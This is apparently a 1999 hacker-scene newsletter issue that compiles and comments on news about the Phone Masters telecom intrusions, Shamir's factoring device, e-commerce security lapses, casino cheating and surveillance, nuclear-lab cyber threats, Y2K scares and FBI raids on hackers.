Simple Nomad sheds some light on the Phone Masters
and the latest reporting on the GTE Telecom hacking.
This is an HNN exlusive.
HNN Report (See below)
HNN correction:
Correction: We made an error on Friday and mentioned
the "Phone Rangers" as the group that broke into GTE's
telecom network. This was the "Phone Masters".
Phone Master Hacks
By: Simple Nomad
Robert Riggs, the reporter for WFAA who reported the "cyber-terrorism" story
http://www.wfaa.com/news/9904/29/
cyber_terrorism_1.html, had contacted me about two weeks ago as he was preparing the story. I was requested
to appear on camera and discuss how vulnerable the nation's infrastructure was. I am glad I declined,
considering the FUD.
The sad thing about this story is that just talking with Riggs about what had happened was actually quite
interesting, and I thought he had quite a scoop. But since his report lacked a lot of the details, here is
what I know.
The Phone Masters were a group of experienced phreakers and hackers, who had been infiltrating GTE, Sprint, MCI,
and several Baby Bells. They had access to pretty much everything. GTE, the Bells, and the others had no idea
these guys were into their systems. They apparently had access to pretty much everything, hence they had the
ability to "wreak havoc".
There have been at least 7 arrests that I am aware of, including 5 of the group and 2 private investigators in
Dallas. The charges supposedly range from various computer crimes to various phone fraud felonies. I suspect
there will be a conspiracy charge as well.
There appears to have been two distinct philosophies at work here, one criminal, and one VERY criminal. Part of
the Phone Masters were profitting financially from the hacks, while part were just exploring the phone systems.
It appears the reason they were caught is that one of the non-profitting guys became angry after learning of the
guys selling information, and ratted them out. Had this not happened, they'd still be deep inside the phone systems.
The Feds and the phone companies feel comfortable they have all of "them" out of the phone systems and that the
nation can rest easy.
A real interesting thing with this case is that it supposedly marked the first time the FBI used taps on phone
lines that allowed the Feds to view the online sessions. I wish I had more technical detail here, Riggs referred
to it as an "analog" trace, but the basics seemed to be somewhat like the Shimomura "videos" of Mitnick at
http://www.takedown.com/. I'm willing to bet a certain Mr. Shimomura helped set the Feds up with this capability.
The main alleged criminal things were that several of the Phone Masters were selling credit reports and other
personal info (hence the arrest of the 2 PI's, who were "information brokers"), selling of long distance access
codes, and pilfering and exploitation of credit card numbers. This is probably the main area where the Feds
will make their case, being that it is more "criminal" than simply gaining access and poking around, although my
guess is any conspiracy charge will put all of them in jail for a long time.
At the time I spoke to Riggs, he was aware of only one time when some of these guys informed a suspected drug
dealer (in Colorado, I believe) that there was a tap on his phone, apparently blowing some big DEA investigation.
My source on all this was based on my email and phone conversations with Riggs, and putting two and two
together after reading the online version of the story and recalling what Riggs said.
@HWA
13.0 Israeli Sciemtist reports advance in codebreaking
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Israeli Scientist Reports Discovery of Advance in Code Breaking
contributed by weld
Shamir, the 'S' in RSA, has developed a new device that makes factoring the large numbers used in public key
cryptograpy much easier. This makes those 512 bit PGP keys potentially vulnerable. You did pick 1024 bit didn't
you?
NY Times
http://search.nytimes.com/books/search/bin/fastweb?getdoc+cyber-lib+cyber-lib+11455+0+wAAA+Shamir
May 2, 1999
Israeli Scientist Reports Discovery of
Advance in Code Breaking
By JOHN MARKOFF
An Israeli computer scientist is expected to shake up the world of
cryptography this week when he introduces a design for a device
that could quickly unscramble computer-generated codes that until now
have been considered secure enough for financial and government
communications.
In a paper to be presented Tuesday in Prague, the computer scientist,
Adi Shamir, one of the world's foremost cryptographers, will describe a
machine, not yet built, that could vastly improve the ability of code
breakers to decipher codes thought to be unbreakable in practical terms.
They are used to protect everything from financial transactions on the
Internet to account balances stored in so-called smart cards.
Shamir's idea would combine existing
technology into a special computer that
could be built for a reasonable cost, said
several experts who have seen the paper.
It is scheduled to be presented at an annual
meeting of the International Association for
Cryptographic Research, which begins on
Monday.
The name of Mr. Shamir, a computer
scientist at Weizmann Institute of Science
in Rehovoth, Israel, is the "S" in R. S. A.,
the encryption design that has become the
international standard for secure transmissions. He is a co-inventor of
R.S.A. -- with Ronald Rivest of the Massachusetts Institute of
Technology and Leonard Adleman of the University of Southern
California.
R.S.A. is known as public-key cryptography. In this system, a person
has a public key and a private key. The public key is used to scramble a
message and may be used by anyone, so it can, even should, be made
public. But the private key that is needed to unscramble the message
must be kept secret by the person who holds it.
R.S.A., like many public-key systems, is based on the fact that it is
immensely difficult and time-consuming for even the most powerful
computers to factor large numbers. But Mr. Shamir's machine would
make factoring numbers as long as about 150 digits much easier, thus
making it much simpler to reveal messages scrambled with public-key
encryption methods.
A number of advances in factoring have been made in the last five years.
But most of them are the result of applying brute force to the problem.
When R.S.A. was created in 1977, Mr. Shamir and his colleagues
challenged anyone to break the code. Employing 1970's technology, they
said, a cryptographer would need 40 quadrillion years to factor a public
key, and they predicted that even with anticipated advances in computer
science and mathematics, no one would be able to break the code until
well into the next century.
In fact, a message the trio had encoded with a 129-digit key successfully
withstood attack for only 17 years. It was factored by an international
team of researchers in 1994.
Using Mr. Shamir's machine, cracking the 140-digit number would be
reduced to the difficulty of cracking a key about 80 digits long --
relatively easy by today's standards.
Researchers said that if his machine worked it would mean that
cryptographic systems with keys of 512 bits or less -- that is, keys less
than about 150 digits long -- would be vulnerable in the future, an
exposure that would have seemed unthinkable only five years ago. The
longer 1,024-bit keys that are available today would not be vulnerable at
present.
14.0 Ecommerce being hit hard by the shopping carts scandal?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Companies That Ignore Online Security Are Risking Customers
contributed by weld
The noise of all these online shopping cart security
lapses has finally made the mainstream. Guess what?
Some e-commerce sites have not hired anyone with
security expertise to audit their sites.
Some sites say since they use SSL that they are
secure. They just don't get it do they. So the armored
truck transferring the data is secure but what about the endpoints.
NY Times
http://www.nytimes.com/library/tech/99/05/cyber/commerce/03commerce.html
By BOB TEDESCHI
Companies That Ignore Online Security
Are Risking Customers
To placate those who worry about how secure it is to shop online,
companies typically proffer the idea that buying on the Internet is
no more risky than giving a credit card to a waiter in a restaurant.
Given recent reports of E-commerce security lapses, that analogy may be giving
waiters a bad name.
Analysts and executives agree that a vast majority of E-commerce sites are
secure, but some say the trend may actually be heading in the opposite
direction. Many companies so fear being overtaken by a competitor who got to
the Web first -- of "getting Amazoned," in the industry vernacular -- that they
rush past security issues in their zeal to establish a Web site.
Some companies lack the technical knowledge to use security safeguards; others
say they cannot afford security products and advice. And there are those who simply
do not consider it a priority.
"I wish I had a dollar for every one of my clients that said, 'I don't care if
the transaction is really secure; I just need my customers to think it is,'"
said Larry Erlich, partner at Domainregistry.com, a Philadelphia company
that registers Internet addresses and provides Web consulting services.
In the case of one recently disclosed security problem, though, the issue
seems to have been not a lack of concern by the Internet retailers but a
limited technical knowledge. Two weeks ago, a Seattle Internet service
provider, Blarg Online, reported that several software products that were
used to create the "shopping cart" technology employed by some Web
retailers could leave credit card numbers and other personal data
exposed on a company's server, if the software was improperly installed.
Those wishing to get at that information simply needed to type a few
words and numbers into a search engine like Alta Vista, and they would
have been able to get access to a compromised site's data files. The
makers of the software say they have addressed the problem, but
industry experts said problems involving other software and other Web
sites could follow closely behind.
One reason, said David Taylor, a vice president at the Gartner Group, a
Stamford, Conn., research firm, is that many Internet companies have
realized the value in collecting and selling customer data, "and in their
quest for that data, people are being less than judicious about how they
gather that information."
Even the leading Internet companies are not immune to security
problems. Earlier this month, for example, Yahoo acknowledged that
customer data of one of its merchants had been exposed to the public. In
that incident, customers of Vitanet, a retailer of nutritional products, had
their addresses, order information and partial credit card numbers posted
on a demonstration site that Yahoo had set up for study by would-be
Web merchants.
Only after being alerted to the security lapse several weeks later did
Yahoo correct the problem, which it attributed to a software bug.
Despite that stumble by Yahoo, many experts say that those most
vulnerable to security flaws are small and medium-size sites.
First, smaller operations often lack the money to hire security auditors --
which can cost $15,000 or more for a one-week sweep of a site -- and
they generally lack the internal expertise to perform such audits
themselves. Second, because they typically operate with a lean technical
staff, such sites tend to rely on one software vendor for security needs.
In fact, it requires more than one type of software to secure a site, security
experts say.
Still, some consultants say it is really not very expensive to provide at least
a basic level of security.
"If you're going ballistic with security, you could spend a lot of money," said
Mamoon Yunus, a regional manager for i.Informix, the E-commerce
division of the computer services company Informix. But otherwise, he
said, "it needn't cost a lot."
For instance, software designed to encrypt customer information as it
travels to the seller, such as that sold by Verisign, costs $350 a year.
And through companies like Cybercash, E-commerce sites can get credit
card encryption and processing services set up for roughly $400, plus a
fee of 20 to 25 cents a transaction. And for as little as $30 a month,
smaller merchants can get secure online storefronts through companies
like Cybercash and Internet providers.
"Basically, there's no reason to have a security problem, except for a
failure to do the homework," said Steven Kramer, president of the
Picture Palace, an online retailer of rare and unusual movie videos.
Those who run E-commerce sites say there is one additional issue
deterring elaborate security systems: the customer's desire to move
quickly through a transaction.
For increased security, customers would have to go through multiple
layers of registration and identity verification before buying, and many
would bristle at the inconvenience, said Steven Rabin, chief technologist
for Interworld, which develops sites for a number of large retailers.
But Taylor, of Gartner Group, said that if reports of security breakdowns
continued, E-commerce companies could be under increased pressure to
regulate themselves if they do not want the Government to intervene.
Taylor said more E-commerce sites should follow the lead of Gateway,
the computer seller.
In its privacy and security statement, Gateway asserts that "none of the
tens of thousands of people who have made purchases through
Gateway's Web site using SSL" -- secure sockets layer technology --
"have reported fraudulent use of their credit card as a result of their online
order."
When asked if, in the event of a security breakdown, Gateway would
post information about it and the company's response, Chuck Geiger,
Gateway's vice president for E-commerce, said: "It's a good idea, but I'd
have to consult with our legal and public relations folks. But in terms of
full disclosure and being honest, it makes sense."
Taylor said that getting the entire industry to follow Gateway's example
could be difficult, though. "The minute these companies start talking about
security, they run the risk of bringing the party to a halt," he said. "But this
is something the Government could impose, because it wouldn't be
expensive for a merchant to do."
The E-COMMERCE REPORT is published weekly, on
Tuesdays.
@HWA
15.0 Computer crime threatens the economy??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www,hackernews.com/
Computer Crime Threatens US Economy
contributed by Simple Nomad
So now all credit card crooks are hackers. Don't be
hitting those URLs for the shopping cart transaction log
files or you will be labled a super hacker.
The one thing that the article has right is how inept
local law enforcement is in catching crooks on the
internet. The Dallas Police disbanded their computer
crime squad because they couldn't get any qualified help.
WFAA-TV News
http://www.wfaa.com/news/9904/30/cyber_terrorism_2.html
N E W S 8 I N V E S T I G A T E S
Computer Crime Threatens U.S. Economy
by Robert Riggs
April 30 1999
DALLAS -- The FBI says a disturbing trend of hacker
attacks and computer crime threaten our nation's
economy.
Specialized computers called web servers store
information about customers who buy products over the
Internet. If a web server is not secure, hackers can
literally take all of the confidential information stored
within, and anyone can become a victim.
ONE VICTIM'S STORY
Computer security expert David Dunagan never expected to become a victim of
computer fraud. Then, a thief stole his identity and his credit card number and
ordered a notebook computer over the Internet.
Now Dunagan knows first hand just how easy it is. "You are one of millions of transactions a
day to somebody, and they don't have time to see who you are, take your credit card, say,
'thank you.' It's just boom, boom, boom, get as many transactions as we can," he said.
Dunagan recently came to News 8 Investigates after Dallas Police refused to look into his
complaint.
News 8 tracked the delivery address for the notebook computer to a North Dallas
apartment complex. A woman who answered the door denied having every heard of David
Dunagan. "Never heard of David Dunagan," she said. "No, I can't help you."
Despite that denial, the apartment's manager said this resident asked that packages
addressed to David Dunagan be delivered to her unit.
It turns out that Dunagan's office assistant is her roommate.
After searching the hard disk drive of the assistant's computer at work, Dunagan
fired her.
Dunagan was frustrated that police could not help him. "Their approach was,
'okay, well, we're too busy. We're too overloaded. We're too overworked right now
to really deal with this, so thank you very much."
CYBERCROOKS -- A STEP AHEAD
Walt Manning investigated computer crime for the Dallas Police Department, but two years
ago, the high tech crimefighting unit was disbanded. "You may or may not be able to
find anybody that can help you -- not because they're not willing, just because they don't
know how," Manning explained. Manning also said these cybercrooks may be
way ahead of law enforcement agencies. "We are starting to see terrorists recruit hackers,"
he said. "I have read reports that show there are drug cartels in the world that now have
professional hackers on their payroll, and have the capability to wage information warfare
against the United States."
In fact, at the start of the air war against Yugoslavia, Serbian hackers bombarded
NATO's website. They overloaded its computer with electronic mail "bombs" until
it crashed.
No one is safe.
Hackers also defaced the Justice Department web page with Nazi swastikas and
pornography. They even hit the CIA, renaming the spy agency the "Central
Stupidity Agency."
CRIME OF THE MILLENNIUM?"
Matt Yarborough, the federal computer crimes prosecutor for North Texas, said this is the
crime of the millennium. "Think about it," he said. "More and more traditional modes of
communication are going on line to the Web." Yarborough warns that hackers can steal
confidential information about customers from unsecured websites, and businesses can lose
millions of dollars in sales if hackers shut down those websites.
"We are adding hundreds, thousands, millions of people per year to the Internet,"
Yarborough said, "and remember -- anybody can be a hacker. Any individual
sitting at their keyboard can choose to hack."
HACKERS SHARE INFO ON THE INTERNET
How do they do it? Hundreds of hacker sites on
the Internet make cyber burglary tools widely
available.
Some feature an international menu of
programs to attack systems. They offer how-to
manuals for beginners.
One software program cracks the mathematical formula used by credit card
companies, generating valid numbers that often pass security checks.
There are many more highly sophisticated programs useful for stealing
information.
FBI Agent Mike Morris demonstrated how a picture of a starburst can conceal a written
document. With just a click, he revealed the hidden message.
He explained that this technique could be useful for terrorists or military spies or even
industrial espionage. "It could be the company's most valuable trade secret.," Morris
said. "'Here mom, here's a picture of Johnny riding his bicycle.' Inside, there is a secret
formula for whatever you are working on."
It's against the law to even try to break into a computer system, but hacker tools
are legal to own until you use them. In response, the FBI and U.S. Attorney urge
companies to form neighborhood watches for computer fraud -- and not to sweep
break-ins under the carpet.
PROTECTING YOURSELF
Here are some tips to protect yourself when making purchases over the Internet:
Be suspicious of anyone who uses an anonymous e-mail address and
doesn't give their name, address, and telephone number.
Never send your credit card number by e-mail.
Be wary of sending checks or money orders.
If you are going to do business on the Internet, there are a lot of questions you
should be asking about how your information is protected.
@HWA
16.0 Cracking the casinos, a Defcon primer? *g*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Silicon Crackers Tackle Casinos
by Vince Beiser
3:00 a.m. 3.May.99.PDT
First of two parts
LAS VEGAS -- Dennis Nikrasch has been tried, convicted, and sentenced to seven-and-a-half years in Nevada state prison. Still, no one really
knows how he stole that US$6 million.
What is generally agreed on, though, is that Nikrasch, 57, is one of the greatest slot-machine cheats in history -- and the most technologically
adept.
"Nikrasch," said Keith Copher, chief of enforcement for Nevada's Gaming Control Board, "is the most sophisticated cheat we've seen."
Nikrasch started out in the 1970s, rigging mechanical-reel slots. His skills, however, have kept pace with the times. Last fall, a months-long FBI
investigation nailed him and several confederates for scamming millions in cars and cash by cracking the silicon chips that control today's
computer-based slot machines.
Nikrasch is only one of a growing number of hustlers using advanced technology to rip off casinos. In belated response, the gambling industry is just
beginning to deploy state-of-the-art security technology.
The stakes of this technological race are mounting rapidly, as the multibillion-dollar gambling industry spreads across the country. Slot cheating
alone is estimated to cost casinos some $40 million a year.
The equipment is easy to come by. You can buy an astonishing array of devices to help you cheat at slots or cards at the Hackers Home Page, for
instance.
Counting cards is not illegal; using a device to help you do it, however, is a felony. That hasn't deterred a generation of grifters from putting the
ultimate counting devices -- computers -- to work for them.
Andy Andersen, a veteran Las Vegas private investigator, keeps a scrapbook of all the scams he's seen. On Page 1 is a Polaroid of a man with a
lunchbox-sized computer on his hip, wired clumsily to a bandoleer of batteries around his chest. The year was 1978; it was the first wearable
card-counting computer Andersen had seen.
"Cheats have been using technology since long before the casinos ever thought they were," said Andersen.
The clunky hip-computer soon gave way to the "toe-tapper," a computer small enough to be hidden in a player's boot. A player uses his toes to
record which cards are dealt, and the computer emits tiny electric shocks to indicate when to hit or stand.
Toe-tappers are still used, but the latest card scam turned up last fall in Atlantic City. Casino security staff discovered that a man playing
high-stakes mini-baccarat had a subminiature video camera disguised as a button on his coat sleeve, which he positioned to monitor the cards as
they slid out of the mechanical shuffling machine. His partner was watching the video from a van in the parking lot, then radioing back, via a tiny
receiver in the player's ear, which cards were coming up.
For fast money, nothing beats the slot machines.
Some older machines can still be successfully jacked with equipment as primitive as a dollar on a piece of duct tape that can be yanked back after
triggering a credit, or a tiny light bulb on a wire that blinds the machines' optic counter so that it keeps spitting out coins.
"There are lots of little ways to cheat," said Frank Luizzo, a former Nevada state trooper who used to infiltrate cheating gangs. "But the guys who
use electronics are going after the cars, the boats, the millions of dollars. That's balls, big balls."
Take Barry Zeltner. Last year, Zeltner figured out a way to run a static electric shock through video keno machines in several Nevada casinos,
forcing them to reset. Zeltner would then play a series of numbers he knew were more likely to come up after a resetting. He scammed an
estimated $750,000, got caught, jumped bail, and is currently on the run.
Nikrasch, however, is believed to have pulled in about $10 million in the late 1970s, a run that earned him five years in prison. He was only out for a
few years before he began his chip-hacking scam.
No one has figured out exactly how he beat the chips, and Nikrasch isn't saying. "I have no desire to explain anything to the public," he wrote
Wired News from jail. "Never smarten up a chump."
Court documents and interviews with law-enforcement officials, however, reveal most of the story.
Nikrasch apparently bought a slot machine to practice on at home and obtained extra computer chips from the machine's manufacturer. He probably
got the keys required to open the casinos' machines on the black market, where casino employees can sell copies for thousands of dollars.
In the casinos, his partners would crowd around to block the surveillance camera's view while Nikrasch opened the machine and the housing around
the computer chip. He would then attach clips to either side of the chip, use a handheld device to force-feed it the jackpot code, and close the
works back up -- all in under a minute.
One of Nikrasch's partners would then sit down to "play." The next coin, of course, would trigger the jackpot.
There's no way of knowing how many other technology-driven scams are going on or how much they cost the gambling industry. Unlike other
businesses, there's no lost inventory to count. "You don't know you're being cheated," said Copher, "until you catch someone."
Copher should know. Just last year, Gaming Control arrested a man for rigging the computer programs in several slots to scam $50,000. The cheat
turned out to be one of his own agents.
PART II
Casinos Fight Back with Tech
Vince Beiser
3:00 a.m. 4.May.99.PDT
Second of two parts.
LAS VEGAS -- The surveillance cameras pick up Andy Andersen the instant he steps into the vast casino at Caesars Palace.
He strolls through banks of slot machines and over to the blackjack tables to chat with a pit boss he knows. By that time, a security agent is on
the phone to the pit, demanding to know why Andersen's there. There can be only one reason: trouble.
Andersen is famous in Las Vegas security circles as a top-notch private investigator, a pioneer who uses cutting-edge technology to catch card
counters, slot scammers, and all manner of casino cheats.
He is best known for his remote-monitoring system. Using a laptop and a cell phone-modem, Andersen can link into a client casino's surveillance
system from anywhere, check a suspected grifter's face against his private database, and tell surveillance whether to evict him.
Tonight, however, Andersen, his white hair gelled back and a pair of tiny gold handcuffs on a chain around his neck, is just checking on the
progress of a new system he plans to take online in 1999. It will move casino surveillance technology to a new level: a digital casino network that
incorporates biometric facial recognition technology.
"We've got to get into high technology," said Andersen, "because the cheaters have."
Most casino security systems are surprisingly behind the technological times, thanks to the complacency of their old-school owners and the vast
profits they rake in despite the cheaters. But as the gambling companies grow ever larger and more sophisticated, the casinos are beginning to
realize how tech-savvy cheaters are ripping them off. And they're moving to catch up.
"The technology we have now is ancient," said Frank Luizzo, a former Nevada state trooper who now oversees security for Las Vegas' Hard Rock
Hotel & Casino. "The industry didn't realize how much it was losing, so it didn't want to invest more in security. But that's changing now."
The surveillance room of the Tropicana, a Strip landmark, is typical: In a windowless room suffused with a deep cathode glow and the low
thrumming of machinery, two officers sit hunched over keypads, scanning a wall of 52 mostly low-resolution, black-and-white monitors. When
someone on the casino floor catches the watchers' interest, they use a joystick to zoom in, rotating or tilting the cameras as needed.
Meanwhile, the images on the other monitors change every few seconds, cycling through the views from each of hundreds of ceiling-mounted
cameras. Against a wall, 220 VCRs ceaselessly record everything the cameras see.
It's a clunky system. The tapes have to be reviewed manually, are a nuisance to archive, and leave many casinos periodically "blind" for a few
seconds while fresh cassettes are put in.
More-flexible digital systems are only just hitting the market. California-based Sensormatic's Intellex system is one of the most sophisticated.
A Pentium-equipped PC controls up to 16 digital cameras, all feeding into a single monitor via an ISDN line. Everything is archived to DAT tape,
which can then be searched with "motion filters."
Users highlight, say, a stack of chips with a mouse, and the computer searches through hours of tape in seconds to find every instance where
those chips moved. Casino floor managers, or detectives like Andersen, can also tap into the system at any time from their laptops.
The trouble, said Sensormatic spokesman Alex Durazo, is that "it's not real time, just 15 to 20 frames per second. That means you could miss
split-second movements."
Real-time digital recording is still prohibitively expensive, considering that most casinos have upwards of several hundred cameras recording
nonstop. Digital recordings are also inadmissible in court because of concerns over the ease with which they can be altered.
The industry's prevailing mindset, however, also slows the acceptance of new technologies. Ask Oliver Schubert, president of Casino Software &
Services, which developed a voice-controlled program that analyzes blackjack players to determine whether they are counting cards.
"When we started seven years ago, we had to supply the computers along with the software system because most casinos didn't have them," said
Schubert. "There are a lot of old-timers in this business who just want to do things the way they always have."
Among the antiquated weapons in the Strip's defensive arsenal is a fax network linking a dozen or so casinos. Today, when surveillance at one
casino spots a cheater, it faxes a picture of the miscreant to everyone else in the network.
"Half the time, it just comes out a black square," said Keith Michaels, the Tropicana's director of surveillance.
That network is exactly what Andersen's company, CVI, is out to replace. Starting sometime in mid-May, CVI's network will connect at least 15
casinos around the country, enabling them to digitally transmit scanned images of cheaters to each other.
Andersen can also provide remote assistance with his laptop surveillance system. But his job, too, will become partly automated.
Using technology marketed by CVI partner Biometrica Systems, the system will also allow surveillance agents to capture a live image of a suspicious
player's face, then run it against a digitized photo database of known cheaters for instant identification. The system has already been installed in
three major casinos.
"As gambling spreads, there are more cheats to watch in more casinos," said Andersen. And more ways than ever to watch them.
@HWA
17.0 Crackers gearing up to attack U.S nuke labs?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://cnn.com/US/9905/03/us.china.spy/
Report warned of cyber attacks
on nuclear labs
May 3, 1999
Web posted at: 1:01 a.m. EDT (0501 GMT)
WASHINGTON (CNN) -- A classified report from U.S. intelligence agencies warned the Clinton
administration in November that computer systems at national nuclear weapons labs were vulnerable to
cyber attacks, a senior administration official told CNN on Sunday.
Yet a Taiwan-born researcher, suspected of downloading sensitive files while working at the Los Alamos
National Laboratory in New Mexico, was able to keep high-level security clearance until his firing in March.
Wen Ho Lee reportedly took information from a secure computer database at
the laboratory and transferred it to a less secure system, which would have
been accessible from outside the lab.
The agencies conducted the threat assessment as a result of a directive issued
in February 1998 by President Clinton, after allegations that China obtained
U.S. nuclear secrets by penetrating the Los Alamos National Laboratory.
A senior U.S. lawmaker predicted Sunday that there would be more
"revelations" concerning suspected nuclear espionage by China.
"The damage was bad, a lot worse than people ever imagined," said Sen.
Richard Shelby (R-Alabama).
"I'm afraid they have a lot more than we ever dreamed," said Shelby,
chairman of the Senate Intelligence Committee, on "Fox News Sunday."
The November report documents more than 200 attempts to infiltrate
non-secure computer systems at the nuclear laboratories.
But nuclear laboratories are not the only vulnerable government facilities. A
number of federal agencies, including the Department of Defense, are
routinely attacked by hackers.
The threat assessment warned that China, Russia and India could seek U.S.
nuclear secrets. A number of government investigations warned various
administrations dating back to President Bush about lax security at the labs.
One recent General Accounting Office report raised concerns about a U.S.
overseas visitor program that allowed hundreds of visits without background
checks.
Last October, Energy Secretary Bill Richardson initiated a number of
measures to improve security at the nuclear labs.
In mid-March of this year, he launched a program to improve cyber security.
Later in the month, Richardson learned of the cyber spying allegations against
Lee.
According to Richardson, the information in question related to simulated
testing for nuclear weapons and nuclear weapons design.
The FBI, which had been investigating Lee since 1996, had attempted without
success to have the Justice Department approve a court-authorized wire tap
or search warrant.
Justice officials had questioned whether there was enough evidence to pursue
a wire tap or search warrant.
Richardson said he shut down computer work at the labs for two weeks
beginning April 2 of this year.
Lee agreed to allow the FBI and Energy Department to check his computer
files. He has denied any wrongdoing and has not been charged with any
crime.
He was fired in March from his Los Alamos post for allegedly failing to
inform Energy officials about contacts with China, and allegedly failing to
safeguard classified materials.
Shelby said his committee would soon focus on how the Justice Department
and the FBI dealt with Lee, who reportedly came to the attention of
investigators in 1994.
"There is a lot of blame to go around, and I think it's serious," Shelby said.
Lawmakers including Shelby have questioned why so many warnings seemed
to go unheeded, and why it took so long to zero in on Lee's alleged activities.
"It looks to me like this is a botched investigation by the FBI, and I think there
is some culpability with the Justice Department," Shelby said. "I think the
Justice Department treated this as an ordinary case when it should have been
an extraordinary case."
Justice officials were not available for response.
Justice Correspondent Pierre Thomas and Reuters contributed to this report.
@HWA
18.0 Calling all |<rad hax0rZ!
~~~~~~~~~~~~~~~~~~~~~~~~~
From ProjectGamma http://www.projectgamma.com/
Calling all /<-RaD hax0rZ
May 3, 1999, 23:26
Author: WHiTe VaMPiRe
Yes, you have waiting long and hard, that time spent will finally be paid off! Hackers Associated Online (HaO) is now accepting
members!@!$
Pull out that dust covered winnuke, your copy of AOHell and UpYours; they will finally be put to use. Yes, you read correctly, HaO is
accepted members. You will finally be just as er33rt and f33red as the true elites, move over I-L and #feed-the-goats, it is HaO; they take no
prisoners!
HaO was founded to "to create a safe arena for information exchange"; only if you join and get access to their members' section, that is.
Quick! Send in your application now, because "Not everyone that applies will be excepted into the organization."
But beware, they have hard questions and high requirements if you wish to be a member of this motley crew. You have to answer such brain
boggling questions, such as, "What is a BIOS?", "Who wrote the 'Hacker's Manifesto'?", and "What command do you type to get a directory
listing in Linux?" (I think they mean "folder".).
Be a hax0r, be a man, and be part of HaO.
Related links:
HaO - You know you want it
http://www.hao.org/
@HWA
19.0 Millenium Bug Insurance hoax
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://net-security.org/
EARN MONEY WITH Y2K PROBLEM
by BHZ, Wednesday 6th May 1999 on 9:12 pm CET
"Since April 1, the Australian Securities and Investments Commission -- the
Antipodean version of the Securities and Exchange Commission -- has been running
a massive Internet investment hoax site, inviting gullible surfers to commit to $10,000
and $50,000 investment packages and reap a threefold return on their money". So
someone started to make money from poor people. Read whole article on ZDNN.
http://www.zdnet.com/zdnn/stories/news/0,4586,2252308,00.html
@HWA
20.0 Y2K Viruses
~~~~~~~~~~~
From http://net-security.org/
by BHZ, Tuesday 4th May 1999 on 10:12 pm CET
Sunday Times did an article on possible year 2000 viruses. "The latest trick for virus
writers is to gain access to an e-mail user's address book to get names and
addresses to send rogue programs so that the recipients believe they have received
something from a trusted friend". That was famous routine of Melissa virus. According
to them E-mail containing year 2000 greetings cards and fabulous millennium offers
are expected to spread viruses. Lol, who will open .exe file saying that it is a e-mailed
postcard? Ppl beware. Now days you must have a antivirus program (Sophos or McAfee will do) .
@HWA
21.0 Two virii more powerful than CIH kept hidden
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://net-security.org/
2 OTHER VIRIIS HIDDEN
by BHZ, Monday 3rd May 1999 on 9:18 pm CET
Chen Ing-hou, famed CIH creator said that he has almost finished designing two more
powerful versions. He told the press that one of the new viruses would be able to
penetrate servers of Microsoft's NT Windows and paralyse them. Police said that they
will search his home in order to destroy viruses.
@HWA
22.0 Microsoft keeps lid on Y2K fix for windows95 users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://net-security.org/
YK2 FIX WAS KEPT AWAY FROM WINDOWS USERS
by deepcase, Monday 3rd May 1999 on 7:52 pm CET
For almost a year, Microsoft Corp. withheld from its 125 million corporate users of
Windows 95 the information that a software patch was in the works to make the
desktop operating system fully year 2000-compliant, a Microsoft official confirmed
last week. More about this on CNN.
From ComputerWorld;
Windows 95 Y2K fix was kept from users
May 3, 1999 Web posted at: 11:28 a.m. EDT (1528 GMT)
by Julia King
(IDG) -- For almost a year, Microsoft Corp. withheld from its 125 million
corporate users of Windows 95 the information that a software patch
was in the works to make the desktop operating system fully year
2000-compliant, a Microsoft official confirmed last week.
"I don't want people taking action based on Microsoft thinking about
doing something," said Don Jones, year 2000 product manager at Microsoft.
"Until I'm 100% sure that we're going to provide an update or fix, I don't want
to tell anybody," Jones added. "People will spend millions of dollars,
[implementing strategies based on such information], and the last thing I want
to do is spread fear, uncertainty and doubt in their minds."
One company now gearing up to spend millions on an upgrade from Windows
95 to 98 -- based at least partly on year 2000 concerns -- is Electronic Data
Systems Corp. Until mid-March, EDS officials believed -- like all Windows 95
users -- that Microsoft wouldn't make Windows 95 fully year 2000-compliant.
At best, they were told, Windows 95 would be "compliant, with minor issues."
Jones' comments are the latest in a series of clarifications, memos and statements to
emerge from Microsoft since March 29, when Computerworld ran a front-page story
about EDS's about-face plan to migrate 100,000-plus desktops from Windows 95 to
98.
Previously, EDS planned to stick with Windows 95, but it changed course on
Microsoft's advice to the company, according to an internal memo by former
CIO Gary Rudin, who abruptly resigned from EDS on March 31.
Microsoft denies
But then and now, Microsoft officials insist they never advised EDS or any other
corporate customer to remain on Windows 95 or to upgrade to Windows 98 for year
2000- readiness reasons.
So why would the CIO of EDS send out a memo saying as much?
"You'll have to ask Gary [Rudin]," Jones said. "It's certainly not our policy. We
do recommend that people go to the latest versions of our operating system,
but not for year 2000 reasons."
Rudin didn't return telephone calls last week.
Also, following the March 29 story about EDS, Microsoft issued an internal
market bulletin to its sales staff to eliminate what it described as "confusion"
generated by the Computerworld story.
Among other things, the bulletin told salespeople that "the Computerworld
article is very misleading," and despite the article's suggestions, "Microsoft's
position on Windows 95 Year 2000 compliance has not changed."
Yet under a section titled "Facts Regarding... Year 2000 Compliance," the
company tells its salespeople that "Microsoft is providing a software update
for Windows 95 to resolve the outstanding minor issues."
When questioned by Computerworld reporters, Microsoft officials couldn't
specify any incorrect or misleading information in the March 29 story.
@HWA
23.0 Iron Lungs and DK get raided by the FBI
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Iron Lungs Raided by the FBI
contributed by Anonymous
Iron Lungs and dk were raided by FBI officials early Tuesday morning. The FBI confiscated all of the
suspects computer systems (possibly including their web server -www.legion2000.org). The two people
were in several organizations such as HcV, Forpaxe, l2x, and #feed-the-goats. They were taken into
custody and later released for allegedly breaking into 45 military servers, 17 nasa.gov servers and
various gov.uk, gov.se, gov.au servers. HNN has received email that this was reported in the Bristol
Herald Courier and possibly even the Myrtle Beach Times. We have not yet been provided with a URL to
verify this story.
HNN has spoken with Iron Lungs via IRC who has verified this story. It is still uncomfirmed as to
'dk' involvement.
@HWA
